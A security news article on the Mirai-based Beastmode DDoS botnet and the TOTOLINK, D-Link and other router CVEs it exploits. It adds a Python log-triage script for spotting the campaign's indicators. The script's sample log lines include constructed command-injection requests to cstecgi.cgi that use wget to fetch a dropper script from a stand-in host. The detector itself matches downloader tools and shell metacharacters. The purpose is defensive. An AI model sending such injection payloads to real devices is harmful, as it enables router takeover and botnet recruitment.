New Mirai-Based Campaign Targets Unpatched TOTOLINK Routers
Firmware Updated; Users Advised to Patch to Avoid DDoS Attacks
A malware campaign now under way in the wild is targeting unpatched TOTOLINK routers. By leveraging newly released exploit code, the threat actors can infect vulnerable devices before owners apply patches, according to researchers at security firm FortiGuard Labs.
The variant of the Mirai botnet behind the campaign, called Beastmode, was observed exploiting newly disclosed vulnerabilities in TOTOLINK routers between February and March 2022. Researchers say the distributed denial-of-service botnet, Beastmode - aka B3astmode - updated its arsenal by adding five more exploits, three of which target vulnerable models of TOTOLINK routers.
TOTOLINK is a brand owned by Zioncom, a Hong Kong-based manufacturer of network communication products, including indoor and outdoor wireless routers and access points, wireless USB adapters, wireless modules, switches and wired routers.
"This inclusion of TOTOLINK exploits is especially noteworthy as they were added just a week after the exploit codes were published on GitHub. We previously reported on the MANGA campaign, which similarly adopted exploit code within weeks of their release. By rapidly adopting newly released exploit code, threat actors can potentially infect vulnerable devices and expand their botnets before patches are applied to fix these vulnerabilities," FortiGuard Labs says.
TOTOLINK has released updated firmware for the affected models, and users are encouraged to update their devices immediately.
"Mirai provided a solid base for many botnets in the last five years. The attack vectors and functionality provided by Mirai are adequate for building large-scale botnets. What differentiates Mirai-based botnets are the exploits, and it’s this part that requires maintenance. Exploits determine the ability to harvest new devices and grow the footprint of the botnet," says Pascal Geenens, director of threat intelligence at Radware.
He tells Information Security Media Group that botnets are mainly leveraged by attackers-for-hire and by booter and stresser service operators who monetize DDoS attacks; they have a wide reach because devices can be harvested around the globe, which makes botnets very useful tools to bypass geo-blocking restrictions.
Geenens says many booters and stresser services have been adding geographically based options so subscribers can perform attacks on targets from within a certain geographic location and bypass any geoblocking measures that may exist.
The latest Mirai-based Beastmode campaign derives its name from filenames and URLs used for its binary samples, as well as a unique HTTP User-Agent header "b3astmode" within the exploit requests. Researchers found that the binary samples were based on the publicly available source code of the Mirai botnet.
As with other DDoS botnets, researchers say that Beastmode uses a variety of exploits to infect more devices in addition to brute-forcing credentials.
The following is the list of vulnerabilities in TOTOLINK routers that the campaign exploits. All of them have a CVSS score of 9.8 and are rated "critical."
- CVE-2022-26210 affects TOTOLINK A800R, A810R, A830R, A950RG, A3000RU and A3100R. The vulnerability allows attackers to execute arbitrary commands via a crafted request.
- CVE-2022-26186 affects TOTOLINK N600R and A7100RU. It is a command injection vulnerability via the exportOvpn interface at cstecgi.cgi.
- CVE-2022-25075 through CVE-2022-25084 affect TOTOLINK A810R, A830R, A860R, A950RG, A3100R, A3600R, T6 and T10 routers. They are command injection vulnerabilities in the "Main" function that allow attackers to execute arbitrary commands via the QUERY_STRING parameter.
The researchers found that in addition to TOTOLINK products, the threat actors behind this campaign target discontinued D-Link products - DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L and DIR-836L - via CVE-2021-45382.
The researchers say, "The samples caught on Feb. 20, 2022, contained a typo in the URL, where 'downloadFile.cgi' was used instead of 'downloadFlile.cgi' used by the devices. This had been fixed in samples captured three days later, suggesting active development and operation of this campaign." They add that the campaign "also attempts to exploit CVE-2021-4045," which they say is "a vulnerability for the TP-Link Tapo C200 IP camera, which we have not observed in other Mirai-based campaigns. While the current implementation of the exploit is incorrect, device owners should still update their camera firmware to fix this vulnerability."
FortiGuard Labs also found a couple of older vulnerabilities in the samples analyzed, including CVE-2017-17215, which targets Huawei HG532 routers, and CVE-2016-5674, which targets NUUO NVRmini2, NVRsolo, Crystal Devices and NETGEAR ReadyNAS Surveillance products.
"While affecting a variety of products, these vulnerabilities are all similar in that they allow threat actors to inject commands to be executed after successful exploitation. This usually involves using the wget command to download shell scripts to infect the device with Beastmode," the researchers say. "Once devices are infected by Beastmode, the botnet can be used by its operators to perform a variety of DDoS attacks commonly found in other Mirai-based botnets."
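The indicators the researchers describe - the "b3astmode" User-Agent, requests to the cstecgi.cgi exportOvpn interface, shell commands smuggled through the query string, the D-Link downloadFlile.cgi path and its misspelt early variant, and a wget download of the dropper script - can be checked against a router's or an IDS's HTTP access log. The following is an added example written for this article, not code from FortiGuard Labs or from the botnet; it assumes an Apache/nginx combined log format and runs over constructed sample lines using RFC 5737 documentation addresses. Indicator names and the scoring rule are the example's own choices.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Assumed log shape: Apache/nginx "combined" format, one request per line. The sample
# lines at the bottom are constructed for this example, not captured traffic.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Shell metacharacters that have no business inside a router CGI parameter value, and the
# downloaders Mirai-style droppers use to fetch the second stage (the article names wget).
SHELL_META = re.compile(r'[;|`]|\$\(')
DOWNLOADER = re.compile(r'\b(wget|curl|tftp)\b', re.IGNORECASE)


def analyze(line):
    """Return a sorted list of indicator names that one access-log line matches.

    Indicators come from the article: the 'b3astmode' User-Agent, the cstecgi.cgi
    exportOvpn interface (CVE-2022-26186), command injection through the query string
    (CVE-2022-25075..25084), the D-Link downloadFlile.cgi path together with the misspelt
    downloadFile.cgi seen in early samples (CVE-2021-45382), and a wget-style download.
    """
    m = LOG_RE.match(line)
    if not m:
        return []  # not a parseable request line; nothing to say about it
    hits = set()
    if "b3astmode" in m.group("ua").lower():
        hits.add("ua_b3astmode")

    url = urlsplit(m.group("target"))
    path = url.path.lower()
    # Decode each parameter value separately so '&' separators are not mistaken for shell '&'
    values = [unquote_plus(p.partition("=")[2]) for p in url.query.split("&") if p]
    decoded_query = unquote_plus(url.query).lower()

    if path.endswith("/cstecgi.cgi") and "exportovpn" in decoded_query:
        hits.add("cstecgi_exportovpn")
    if path.endswith("/downloadflile.cgi") or path.endswith("/downloadfile.cgi"):
        hits.add("dlink_downloadflile_path")
    if any(SHELL_META.search(v) for v in values):
        hits.add("query_shell_metachar")
    if any(DOWNLOADER.search(v) for v in values):
        hits.add("query_downloader")
    return sorted(hits)


def is_suspicious(line):
    """The b3astmode UA is specific enough on its own; otherwise require two weaker indicators."""
    hits = analyze(line)
    return "ua_b3astmode" in hits or len(hits) >= 2


def triage(lines):
    """Return (source IP, indicators) for every suspicious line, in log order."""
    out = []
    for line in lines:
        if is_suspicious(line):
            out.append((LOG_RE.match(line).group("src"), analyze(line)))
    return out


# Constructed sample log lines (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = [
    # Beastmode-style probe of the TOTOLINK exportOvpn interface with a wget dropper injected
    '192.0.2.10 - - [23/Feb/2022:08:15:02 +0000] "GET /cgi-bin/cstecgi.cgi?action=exportOvpn'
    '&type=`wget+http://198.51.100.7/b3astmode.sh+-O+/tmp/b.sh` HTTP/1.1" 200 512 "-" "b3astmode"',
    # D-Link probe using the misspelt path the article mentions in the Feb. 20 samples
    '192.0.2.11 - - [20/Feb/2022:11:40:31 +0000] "POST /downloadFile.cgi HTTP/1.1" 404 0 "-" "b3astmode"',
    # Benign administrator request to the same CGI endpoint
    '10.0.0.5 - - [23/Feb/2022:08:16:44 +0000] "GET /cgi-bin/cstecgi.cgi?action=getSysStatus HTTP/1.1" '
    '200 2048 "http://10.0.0.1/" "Mozilla/5.0"',
    # Injection through QUERY_STRING without the distinctive User-Agent
    '192.0.2.12 - - [24/Feb/2022:01:02:03 +0000] "GET /cgi-bin/cstecgi.cgi?a=1;wget%20http://198.51.100.7/x.sh'
    ' HTTP/1.1" 200 0 "-" "Wget/1.20"',
]

if __name__ == "__main__":
    for src, hits in triage(SAMPLE_LOG):
        print(src, ",".join(hits))
```

The User-Agent string is the strongest single signal, but the researchers' own observation that samples were corrected within three days is a reminder that such strings change; the query-string checks (metacharacters plus a downloader inside a parameter value) catch the same injection technique regardless of which User-Agent the next build sends, which is why the example flags a line on two of those weaker indicators even without the UA match.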
In December 2021, FortiGuard Labs researchers uncovered a malware campaign targeting unpatched TP-Link wireless routers by leveraging a post-authentication remote command execution vulnerability (see: New Mirai-Based Campaign Targets Unpatched TP-Link Router).
The updated variant of the MANGA campaign, also known as Dark, distributes samples based on Mirai’s published source code.
FortiGuard Labs has been "actively monitoring" the Mirai-based DDoS botnet campaign, the researchers say, because of its "continuous updating of its list of target vulnerabilities - more so than other campaigns we have seen so far."